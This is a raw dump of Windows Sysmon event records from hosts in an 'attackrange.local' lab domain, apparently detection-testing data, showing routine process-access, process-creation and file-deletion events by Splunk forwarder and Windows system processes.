07:46:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080648Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080647Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080646Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080645Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080644Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080643Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:33.145{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B159-615A-2801-00000000FD01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080642Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:33.145{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B159-615A-2801-00000000FD01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080641Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:33.145{2FDD8D40-B159-615A-2801-00000000FD01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000080670Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.926{2FDD8D40-B15A-615A-2901-00000000FD01}34202652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080669Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.738{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9E31310A7D291F9A00AFF4147004F15,SHA256=1A32AE7FF58468E1E2682FF52415D9F6B088D74F2AA4F3B3BB265E17CA575AAA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080668Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.738{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B15A-615A-2901-00000000FD01}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080667Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.738{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080666Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.738{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080665Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.738{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080664Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.738{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080663Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.738{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080662Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.738{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080661Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.738{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080660Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.738{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080659Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.738{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080658Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.738{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B15A-615A-2901-00000000FD01}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080657Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.738{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B15A-615A-2901-00000000FD01}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080656Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.739{2FDD8D40-B15A-615A-2901-00000000FD01}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000102782Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:34.327{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CDFA58296DFA9AB94F58E82F73CA71D,SHA256=2C8054F106875B24D6CB4B803FEE7CF72F97A3F21B57F41B45B3077CC8D4B058,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080655Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:34.238{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=017B48EBE099F18A89F3ABED3A51EBBB,SHA256=54A57991C3304058AF1FD5974A808E5CB0A6215442BC484F545328046EFE7902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102783Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:35.342{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE68AC0F68B35AA76272E2772F22DAE2,SHA256=DA4C6808258CA4F9002FCD2A214EBFC01D50A6937380F2A2F8EDFD7B3765599E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080684Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:35.788{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=913101C53D509808F5A38F42BA1A7F03,SHA256=E147A51860F71C059D612672044D56E653B17766FA32348993081118399F718E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080683Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:35.788{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B15B-615A-2A01-00000000FD01}2716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080682Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 